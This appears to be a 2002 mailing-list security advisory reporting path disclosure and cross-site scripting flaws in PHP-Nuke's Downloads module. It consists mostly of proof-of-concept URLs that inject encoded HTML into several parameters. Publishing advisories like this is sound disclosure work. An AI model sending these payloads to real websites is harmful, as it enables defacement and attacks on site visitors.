PHP NUKE PATH DISCLOSURE AND XSS: here: http://nukesite/modules.php?name=Downloads&d_op=viewdownload&cid=%22%3E another one: http://nukesite/modules.php?name=Downloads&d_op=viewdownload http://nukesite/modules.php?name=Downloads&d_op=viewdownload&%22%3E http://nukesite/modules.php?name=Downloads&d_op=viewdownload&cid= http://nukesite/modules.php?name=Downloads&d_op=viewdownload&cid=anything_here older versions were also affected: http://nukesite/download.php?op=viewdownload http://nukesite/download.php?op=viewdownload&cid= http://nukesite/download.php?op=viewdownload&cid=%22%3E There is also some ** XSS ** http://nukesite/modules.php?name=Downloads&d_op=brokendownload&lid=%22%3Ch1%3EFREE%20Downloads%20with%20virus%20included!!!%3C/h1%3E Old style: http://nukesite/download.php?op=brokendownload&lid=%22%3Ch1%3EFREE%20Downloads%20with%20virus%20included!!!%3C/h1%3E some more XSS: http://nukesite/modules.php?name=Downloads&d_op=NewDownloads&newdownloadshowdays=%22%3Ch1%3E%3Cb%3EHax0r!%3C/b%3E%3C/h1%3E Old style: http://nukesite/download.php?op=NewDownloads&newdownloadshowdays=%22%3Ch1%3E%3Cb%3EHax0r!%3C/b%3E%3C/h1%3E Not enough with that: Here we have one that do both "path disclosure" and "xss" http://nuke/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=%22%3Ch1%3ECooooooooooooool!!!!%3C/h1%3E plus this other one: http://nukesite/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=49&ttitle=%22%3Ch1%3EIll%20advertise%20my%20dirty%20underwear%20in%20here%3C/h6%3E or perhaps modify both them: http://nukesite/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=%22%3Ch1%3E%3Cb%3Eboth%20of%20them?%3C/b%3E%3C/h1%3E&ttitle=%22%3Ch1%3E%3Cb%3Ewhy%20not%20modify%3C/b%3E%3C/h1%3E Best Regards -- /* Rodrigo Gutierrez +47 73546339 rodrigoat_private +47 98060198 Trustix AS http://www.trustix.com */
This archive was generated by hypermail 2b30 : Fri Apr 12 2002 - 10:18:43 PDT